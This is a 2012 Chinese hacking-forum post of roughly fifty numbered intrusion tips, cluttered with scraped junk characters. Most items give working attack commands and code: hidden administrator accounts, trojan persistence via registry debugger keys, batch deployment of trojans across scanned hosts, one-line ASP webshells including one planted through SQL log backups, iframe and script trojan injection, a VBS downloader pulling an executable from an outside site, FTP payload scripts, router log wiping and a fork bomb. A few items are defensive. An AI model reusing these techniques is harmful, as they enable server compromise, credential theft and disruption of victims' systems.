找回密码
 立即注册
查看: 2671|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,5 K" a: N! G# m  H& k. c0 G# |
cacls C:\windows\system32 /G hqw20:R5 I  g7 }9 u: R7 Z: @
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
' F$ x* P( K- c; {- w恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
* Z2 b: e7 B9 x1 Q7 j1 t1 G; x1 t8 @+ v2 R& \7 I6 C
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
) V2 d+ h  Z' c9 T: r+ S3 J2 T* y
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
  U1 K. n$ r/ t) p  H  F2 T5 d. X- B( @: F
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号# b6 g- S! v0 f2 n* w, D: X
) Z; U% I, e1 D
5、利用INF文件来修改注册表" S' }6 w; ]- ^& W, }. w1 t3 \2 z7 {
[Version]% J% c6 ]' w5 {1 B: o* Q: L7 X
Signature="$CHICAGO$"  ^  s1 }. b0 p" C# P' \+ Q7 {  B
[Defaultinstall]1 Y' |6 O6 q) u  D) `# G" _, A0 s  V
addREG=Ating
# Y& _( h" ^7 c' n[Ating]/ V8 J; T% x- g
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
/ i* u. |: q. j0 V$ \$ o以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:' N) V9 v& N! I6 ^8 w
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
* b. W9 q; K# C其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU, {* K. R7 ~1 I
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU  P% i* l8 L% Y! s' h: ]
HKEY_CURRENT_CONFIG 简写为 HKCC
2 a1 h1 K. N  v3 n$ `* ]0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
3 e! L) z, P5 v"1"这里代表是写入或删除注册表键值中的具体数据
+ c# u6 Y  w( `* P
0 F+ p, w5 A# J! ]5 s0 m. s! C6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
, b+ ]4 ^6 f8 ^; I3 `; ?. l多了一步就是在防火墙里添加个端口,然后导出其键值: T' c: n: X- P7 A8 J& G
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
* L- g& m* `6 k. Y' ^- ^& R& k( `4 s: Z
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
6 j" u7 d8 t0 @4 d在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。- j3 A: q$ M( J6 o6 _

+ j+ N; D, d# S+ u8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
8 v  a0 t# P: T( v% B( C2 H( e5 j
7 }1 O- S2 a4 R% j; K* ~9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,! ^! j3 u& r" C% `1 P2 \& D
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。- x8 _, Z  Q+ N( [- R
) B! U$ [( ~$ D2 g6 q& s! [
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”, c- h' Q) _* [2 {  G5 t* J2 J4 k
* _( l5 c( `8 s! k0 q( h" Y: n- A
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
( T7 C7 D" K3 C2 m! H用法:xsniff –pass –hide –log pass.txt0 q7 G3 K/ {9 r. i2 o- S

/ z9 L& V: P  h# ^2 H4 _; S( S12、google搜索的艺术# X' W- m+ F( A: U0 n9 v
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
7 M' i8 B' z5 ~. H9 v& g0 T) j1 a或“字符串的语法错误”可以找到很多sql注入漏洞。
( C, m9 N$ V" O( m1 c# |5 ~
( Y6 @" \3 _3 m" E13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
. v# w! ^# \& Z# K& C: f6 F" E: J, n1 g0 ?  T- z$ i
14、cmd中输入 nc –vv –l –p 1987" q3 [) L( B7 r# c; D% V- ~
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
' d1 }: w6 z+ j/ [) W4 }4 Z/ r( c; U& S  t
15、制作T++木马,先写个ating.hta文件,内容为, R* M5 P& o% y$ i
<script language="VBScript">+ g' ]: ?2 v" T/ N; P) ^4 ~9 |3 Z
set wshshell=createobject ("wscript.shell" )
! G. n2 f# `+ V1 D+ n3 V. Xa=wshshell.run("你马的名称",1)4 p' k4 d7 `7 E9 H. n5 A7 W7 M
window.close
* @+ \' R0 ^! ?</script>, ~- \2 j" k/ n0 ]
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
+ }5 l5 P# r% W( Y2 T3 y  v; D$ y# K4 `$ |8 h/ a/ R( Y. K
16、搜索栏里输入( c# p$ U, S2 `- U# ?' O3 z/ K& }2 U
关键字%'and 1=1 and '%'='+ y$ M6 E  \# j2 v; W# j
关键字%'and 1=2 and '%'='3 f' E0 W+ a( S" Y
比较不同处 可以作为注入的特征字符
8 ^- D- F+ P$ ]1 @. n9 n1 ^2 O& v8 e5 _$ p  u( O
17、挂马代码<html>+ P: T2 V- ?' Y; C+ Y) I
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
! R/ c( I* T: {$ \, k$ a' w0 w</html>
* J8 P$ V# n, y+ Y$ l0 K6 k! G" j7 H) ]- Q& f' y5 [0 N
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,) s, s. L( z9 ^& W/ I8 ?0 `
net localgroup administrators还是可以看出Guest是管理员来。
3 I9 I( l/ F1 X% s) e" [7 k; i
% _/ `# ~2 M) c( [7 f19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
! x5 T: u6 H# K- j8 k0 p7 b" I用法: 安装: instsrv.exe 服务名称 路径2 W0 N1 q5 P. p3 x0 F8 n7 N
卸载: instsrv.exe 服务名称 REMOVE* u$ X, T# i/ z9 ^5 }# |& A+ N6 g- O  P
3 z( C) q) L9 I* b
( G8 U4 ?6 ^. n( H$ g
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
1 l% v% f4 @+ V- @! p2 ?不能注入时要第一时间想到%5c暴库。
, R( k* G8 |0 I) Q5 H' F
# I) \& v$ [; K/ N" ~5 M( B! {22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
4 g5 ]+ N: Y  U. u: @
4 o( b0 R8 J0 J. a23、缺少xp_cmdshell时2 B1 p9 r" P% J2 M
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'8 _; i6 }  }9 a" C0 Y0 |
假如恢复不成功,可以尝试直接加用户(针对开3389的)
/ r' }: s$ V! F/ n9 x9 Udeclare @o int
- W' r! U2 O0 Z4 ?: Jexec sp_oacreate 'wscript.shell',@o out% o7 q% w% f8 ~6 M' G) ?
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员; R5 y) q0 G( Y' l! Q

! q9 B7 p# Q5 A" L4 }5 |24.批量种植木马.bat
8 V. y) P( ^; C& V6 X  @9 bfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
+ e/ x: y& |5 J; rfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间; Z$ c" Q% S6 ?$ k' k
扫描地址.txt里每个主机名一行 用\\开头
) i- A' I! R& ?+ P6 {4 @+ Y+ `: a6 z6 x$ M, J3 ~- F/ e
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。6 T% a& s: \, o

" \( T- v% U" J5 U) D( w0 M' R26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
4 V. ]& w, D8 N! S将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
  J! g/ |( ]! R" C$ p' ]. r" g.cer 等后缀的文件夹下都可以运行任何后缀的asp木马. q1 W& @" K$ |& d8 T* u0 J
- `* j" H% M& J3 j% R0 s7 K
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
) _8 G. o# w  L% Y/ [然后用#clear logg和#clear line vty *删除日志
+ K2 c2 C/ P& M) _# _* E
" p1 f. \3 v( ]/ d28、电脑坏了省去重新安装系统的方法0 Z* d' s" {. R4 ?
纯dos下执行,
3 |. j! j# b# |6 Ixp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
2 E% g( \6 r8 C* _/ F2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
' ^# D3 J) e. {; s# O4 j& O# N) ~
4 Y. f6 K) M' j29、解决TCP/IP筛选 在注册表里有三处,分别是:4 p% Z3 p: M0 ^  ]' t9 X
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip; d% E, V( w+ i+ q$ j
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
& W" m0 F8 X+ GHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip5 \6 d9 G: l  E# ~, y
分别用
' k  Y( I7 H4 H3 K% {8 X& Mregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip) X& G! ]4 ?+ ~7 A. e) |- d
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip  w* L. D) i2 T, q) a  r$ j1 N1 L- J
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
! g: [# B6 p7 h0 a: ^( i2 A" n: _命令来导出注册表项
: }$ i0 I  d& C  |然后把三个文件里的EnableSecurityFilters"=dword:00000001,$ K1 U9 s- }& E% q% r
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用  Y; N- u( [+ G# y/ j) `: |& |3 [2 p
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
. d: P" m/ o5 P& Q" \9 m) D! N. M" f9 |. R0 I
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
, u9 Q( m  E1 Y9 a! t" l3 rSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3  ]" T  g8 J4 Y) v3 B6 S9 p, @

6 S# J( Q1 o5 s" x7 ~7 s31、全手工打造开3389工具" f4 v( w2 H- i' ^) |! s
打开记事本,编辑内容如下:
. r6 u; z) i2 D* j  \echo [Components] > c:\sql
" a0 K2 L, P/ I/ Vecho TSEnable = on >> c:\sql
* r* f# a3 f8 O, D, Wsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
  W! G1 f, w" a( V8 X" F+ C1 z编辑好后存为BAT文件,上传至肉鸡,执行
; ?* Q* x4 [0 w5 i" C, Q4 ^: ~; g1 Q; N( W# L1 N4 e  M; q
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马2 t6 z4 Z) x. y1 j8 R  ?+ d+ z8 e

  y/ q) S* l' i* y' s33、让服务器重启: Q" W4 t$ F* X4 A4 Y5 Z
写个bat死循环:
' e5 a: R& x/ x0 g5 b6 ~0 ?" Q@echo off
7 L; d4 J0 x$ r. v/ c:loop14 W* }$ O9 q" `% w2 l1 L2 k3 ]
cls
  l6 ?- b' L2 L) z$ M+ Jstart cmd.exe. _0 J% b$ z4 y( W( G/ b
goto loop1  n$ \. N0 y( S5 z9 s
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
% o: [/ o  I& Z+ g
! \, L5 t% G4 h) J1 U0 m8 f9 B3 g# F34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,) N( ]; {  E& u* q; g8 [' [$ N& ^
@echo off  J* K, t7 G% h% D2 Y* x. X: e
date /t >c:/3389.txt; g+ W% V( t: E0 t( s' K0 s0 J4 k
time /t >>c:/3389.txt1 H+ z/ f5 \, k, k! G: s' g
attrib +s +h c:/3389.bat3 _, n' e; u; P7 B
attrib +s +h c:/3389.txt
" J9 |* N) {9 z: p( znetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
5 i; Y: |" O- u0 A& Q8 @, L$ j并保存为3389.bat) {' q) u/ X$ d" d  b$ d) Y" F8 ^
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号2 P- ^, w. o# M
! x  [: k# p4 X/ t0 Y
35、有时候提不了权限的话,试试这个命令,在命令行里输入:' Z# Y/ i0 X4 e  C( G0 u
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
# S/ ?/ G, C- g" N& J输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。% N; k3 v" c! Y7 j) `# R
8 `1 j1 Q# q+ |
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
" t1 Z/ P; f( ]0 e* W) Hecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
6 j: A8 N+ h/ q: e; W; i$ ~! mecho 你的FTP账号 >>c:\1.bat //输入账号0 F3 l: w8 b5 B7 ~$ d
echo 你的FTP密码 >>c:\1.bat //输入密码
9 i. T% B2 N0 _9 k7 K" ~echo bin >>c:\1.bat //登入
  `' u3 T* E( y* `% w* D0 secho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么- Y( L* D: [- |* m- ~2 u  n
echo bye >>c:\1.bat //退出+ H+ f6 x! l( Z" {
然后执行ftp -s:c:\1.bat即可) U  O% w# C+ j" \& W/ \$ n1 b: ]

: d$ ?/ A% G, x$ x5 z  m37、修改注册表开3389两法
0 U4 H$ `, K: Q* v3 v(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表( t- R8 o2 n$ u+ U& ?8 L( Y) f
echo Windows Registry Editor Version 5.00 >>3389.reg% P; e( Q* `/ Q  t/ z5 E+ p
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg6 j$ @( {# j8 @, i) y
echo "Enabled"="0" >>3389.reg
/ B: N7 U3 _6 E+ ?& W+ r& Xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
6 q7 U, K8 B" WNT\CurrentVersion\Winlogon] >>3389.reg
. k' a0 g! a6 i% j: I- E: I- pecho "ShutdownWithoutLogon"="0" >>3389.reg; r, J) s+ ^& _7 Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]* f' w8 n  ]! C, g- K
>>3389.reg
3 z+ R' O1 P% Q4 B! b& m0 wecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg: O; i- B* l! u6 g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]1 s6 K& ]3 X2 h  Z/ P& O" [/ N
>>3389.reg8 L5 q% w; v' L5 O3 c
echo "TSEnabled"=dword:00000001 >>3389.reg' [$ h$ T0 K; J0 r3 @: y) @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
: p" N; m  F" U- A+ {echo "Start"=dword:00000002 >>3389.reg
2 ^# q% r. Q! g" N# _4 L* E! U/ @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]# D- C( r# ^% j
>>3389.reg
# [) A* |% Y: `$ W8 uecho "Start"=dword:00000002 >>3389.reg
% E9 ~9 f& a) T9 A9 l5 k7 @1 gecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
* C0 D5 _$ }$ y; O2 }echo "Hotkey"="1" >>3389.reg
+ {& y3 r3 {3 X. Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 j: w5 n; w& qServer\Wds\rdpwd\Tds\tcp] >>3389.reg
8 ~+ a7 X% G# v1 Wecho "PortNumber"=dword:00000D3D >>3389.reg6 ], p& Q. k$ R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 O" ~+ R* k- BServer\WinStations\RDP-Tcp] >>3389.reg+ m& r. a7 s& c/ |9 D
echo "PortNumber"=dword:00000D3D >>3389.reg
& A. D# Q7 e. x, v把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
: \* \$ \1 o' \(如果要改变终端端口只须把上面的两个D3D都改一下就可以了): e+ T2 @- v7 o* x4 Z& ]" a
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效- @+ z& F; R) Y
(2)winxp和win2003终端开启
1 w' @4 P& u4 \3 G. b. A用以下ECHO代码写一个REG文件:
+ C) G) z9 r$ M5 K! y3 X4 g2 eecho Windows Registry Editor Version 5.00>>3389.reg
7 n) P  s0 x# Q& ~; ^5 becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& Q+ E* y$ n" B+ XServer]>>3389.reg
% @5 _# m+ ~2 E: T9 Vecho "fDenyTSConnections"=dword:00000000>>3389.reg
! o5 i' u2 p7 m3 K9 lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 s7 M/ ]& m, F( |( p
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
( b% F; q5 a0 i* |( m0 m% U* @6 Xecho "PortNumber"=dword:00000d3d>>3389.reg) _$ U, i& T4 V: O7 M8 s! K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" j5 H6 Z. o( @( u
Server\WinStations\RDP-Tcp]>>3389.reg  f0 U$ \  B  B8 ~
echo "PortNumber"=dword:00000d3d>>3389.reg
: y; Z- c/ U1 ]; U% a# G5 W7 n然后regedit /s 3389.reg del 3389.reg2 e2 `0 T: O- O& ^, ^# M" B
XP下不论开终端还是改终端端口都不需重启
2 J% z6 ~2 O/ N* @+ x) Q. x; x. `) ^. R! \& V/ k
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃, Y! x, O3 \# {# H
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
5 m1 Y2 F+ h* n" q" {
7 s, }1 j' S% j. j" ]& n39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!8 A/ E  h! q! t8 v- ^" M: a4 x
(1)数据库文件名应复杂并要有特殊字符
) I6 V  [2 F# o- H/ E, k7 B% N(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
3 m6 M$ P, E  }/ X$ [将conn.asp文档中的
/ h) [. T( |+ nDBPath = Server.MapPath("数据库.mdb")# E4 d& n5 d# i% Y+ p3 \4 j
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath  C/ _& b) F  H0 c
8 b/ i' F% [! V9 j  j$ b' U
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
  m" g2 P8 }/ ?9 C" }- n(3)不放在WEB目录里. M/ H7 l9 L5 U$ W. Q- v
) a4 D5 E- u5 K* G8 b
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
, o- k2 G7 {3 t可以写两个bat文件) F2 {; _) z: a# l, ^7 b4 h
@echo off6 l* j& E1 v/ _- E! j
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe: W2 E# M" v+ S  s$ r; e
@del c:\winnt\system32\query.exe  ~. j' p( Q( p6 H2 z
@del %SYSTEMROOT%\system32\dllcache\query.exe9 _5 S/ i' ~) o8 ]
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
. A) `" r$ G+ i1 s2 q5 a! t" C
$ i) ^" d6 C1 c4 q/ a; k. U" \@echo off
) o1 q  @% e' A2 A5 F1 r, q6 M@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
  u5 T3 i7 _1 e4 N. D' }@del c:\winnt\system32\tsadmin.exe
9 r8 y! y( G$ Q@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex. l. q1 [6 G( Q: d: D, ~  n- x

+ Y+ `" g( R& B# j' c2 L; P$ U& `& |41、映射对方盘符
! i5 U8 |; @- ^: ]+ r2 h0 ztelnet到他的机器上,
8 K( E" F, z/ x; h: z, B, u5 ]net share 查看有没有默认共享 如果没有,那么就接着运行5 p- ~  G( k: h: P9 [& x  c
net share c$=c:' t( g9 Q9 ^0 _2 V0 o
net share现在有c$
( d5 i* n; ^  u* D3 n在自己的机器上运行
- k3 h  f3 V5 _1 Wnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
; E4 _/ t8 `; i& Q" B9 T0 j- y# ~0 k* m3 R% E
42、一些很有用的老知识
! O. J6 g& R% n5 wtype c:\boot.ini ( 查看系统版本 )
( f5 V9 q- ^) q' U" enet start (查看已经启动的服务)! f+ b; R8 ?# w0 M# h2 |
query user ( 查看当前终端连接 )
+ X9 W/ E% F! a3 B1 Anet user ( 查看当前用户 )" y7 e- a2 D) ^' o! [5 S+ }
net user 用户 密码/add ( 建立账号 )
) Q' \( C( M  C0 u$ onet localgroup administrators 用户 /add (提升某用户为管理员)# a$ p6 t4 |# f: m$ U
ipconfig -all ( 查看IP什么的 )
! m; N0 P% V) [* A: h+ y8 unetstat -an ( 查看当前网络状态 )
$ q/ u  R: R5 i: @) Tfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
) ^- ]. h9 Z. J: m1 e; U克隆时Administrator对应1F4
- A* }% D0 p! B- w# R- b7 ^; d$ mguest对应1F5
" y( [$ o8 G0 I( p" ttsinternetuser对应3E8
! M6 B, Z7 a6 [" I$ R" Q( t: R. h& R8 ]/ Z
43、如果对方没开3389,但是装了Remote Administrator Service" i& c! f. b4 D, C6 M
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接; r2 e  U" p7 h" j
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息! \: D! x6 [& L7 l  B- h
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
. N3 E3 k" f; d( I$ x
: B: ~! k; O% w44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
# Q0 w0 Z$ ^3 q9 X$ M本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)8 B( e1 n0 n* P+ f$ U
4 D) `! ^( x, M. c# ?9 N1 u% N
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)/ x& L! C7 L; R2 B
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open1 |) ^+ G% [( |( h
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =% o! j" u! c' g+ ^, x- ]$ b4 z
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
5 E4 w5 i- J4 x1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs' ?$ p4 N5 N1 p! B7 L- J
(这是完整的一句话,其中没有换行符)$ P/ |- M5 Y$ X+ V5 _# v) \
然后下载:$ ^+ W5 N% H6 c3 Q8 U  N" p0 R, H
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
6 r( m- A# @- C$ j- b) v: q% g* _1 ^/ Y3 P: y) a5 b0 s& g
46、一句话木马成功依赖于两个条件:( u& t/ A2 U% b5 {# B
1、服务端没有禁止adodb.Stream或FSO组件( Y" Y9 f9 P5 n' E% g8 U4 Y. |
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。- U) e2 u$ o/ a

! ?( }% r6 a! U47、利用DB_OWNER权限进行手工备份一句话木马的代码:
: r$ P; n' C7 \% J6 v" y;alter database utsz set RECOVERY FULL--+ H# _/ y' ~& Z  c/ S- {, m
;create table cmd (a image)--3 X8 V' d# q5 Q% E- s4 ^
;backup log utsz to disk = 'D:\cmd' with init--( M; T9 Y! u$ F5 b' Y. }# q
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--* O. C4 o1 K  i
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--( e" T* c! F1 e+ N& j  k
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。7 H; G7 C, m+ C( t
* V$ c. P" Y* w  B& v: i+ H
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:4 g1 f9 |9 l6 |( v6 l$ S

& j7 C9 V, X# b, V. u8 c用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
% G& x( G* G0 `6 r% X9 \+ Y所有会话用 'all'。
2 K3 Z! X9 c! G; ~2 m-s sessionid 列出会话的信息。
. v0 W; Q3 L3 W" P3 ]5 b7 R; p, ^, U-k sessionid 终止会话。
; C, e) E- ^0 x( Y- h  p-m sessionid 发送消息到会话。6 f5 B9 ^  X$ Q; ]
" B4 V8 R3 r1 |$ Z6 b6 U# I
config 配置 telnet 服务器参数。  o# }' t2 m& J& T. p  u
- r7 r: y9 `- B; g$ U3 C
common_options 为:
7 W5 p8 v! Z( k-u user 指定要使用其凭据的用户
- a) W0 p! B4 H$ b1 A% B' c-p password 用户密码$ N5 G% J. e7 r3 d$ {- K0 x$ q
) e( ]% I5 K' C; h/ V! \+ P
config_options 为:9 g/ {- B# r. ]  r& |/ W
dom = domain 设定用户的默认域1 z9 r8 {. {# S
ctrlakeymap = yes|no 设定 ALT 键的映射* [) o' t- Z! }' l
timeout = hh:mm:ss 设定空闲会话超时值
, m( r  y9 K" Ntimeoutactive = yes|no 启用空闲会话。7 |  x& F: J. Q; P. Y, }
maxfail = attempts 设定断开前失败的登录企图数。
& X/ `- W4 [. e6 B  v9 `maxconn = connections 设定最大连接数。) {8 t/ _, k( ^
port = number 设定 telnet 端口。
3 J% X' Q1 p( W8 `0 e0 Tsec = [+/-]NTLM [+/-]passwd
. V  q* L- l: p  S* h9 S设定身份验证机构% N: N6 H1 x  A6 z% a$ {
fname = file 指定审计文件名。
/ J  \1 `5 o; Z  c$ Mfsize = size 指定审计文件的最大尺寸(MB)。) L' j) Y; V7 H1 g
mode = console|stream 指定操作模式。: b% y  p) c% A+ j) B
auditlocation = eventlog|file|both
0 ^6 K: m, A: y' ^- a9 O! S指定记录地点  e; f2 L) A9 A6 u2 C; [  }
audit = [+/-]user [+/-]fail [+/-]admin
5 U2 B6 I* |3 M, U' J8 I7 R
* X5 ?8 s4 i( |- C  b49、例如:在IE上访问:
/ d, E$ P$ t3 v7 B4 A/ xwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
! h  G3 y) Q4 k- \/ ]8 `; C2 nhack.txt里面的代码是:
2 b# }9 F3 Q* x0 ~% p8 ^" ^+ h  ^2 ~4 G<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
, B$ F" Y$ i7 g* M把这个hack.txt发到你空间就可以了!
* q" q) n7 A" m  K7 W8 [这个可以利用来做网马哦!/ B1 F5 x' z& ~1 ^9 |
: Y  T4 r+ r& F$ e5 y
50、autorun的病毒可以通过手动限制!) B) V. p- _* F, U! E
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
$ R2 [- \, r# g% m7 ?2,打开盘符用右键打开!切忌双击盘符~+ L3 g) ]9 x; H" j
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!4 Y/ t' Q9 a1 Z/ U) d
9 P0 n( b- h3 b! M3 X3 }. @" D
51、log备份时的一句话木马:& h# y! I$ n( \0 c+ `  c' P2 U
a).<%%25Execute(request("go"))%%25>; R) t0 l0 t5 g+ ]. o
b).<%Execute(request("go"))%>( [/ u; O' k% t$ X; ^, O; B" h
c).%><%execute request("go")%><%* Y& w* V4 U) L/ T+ V/ k( [
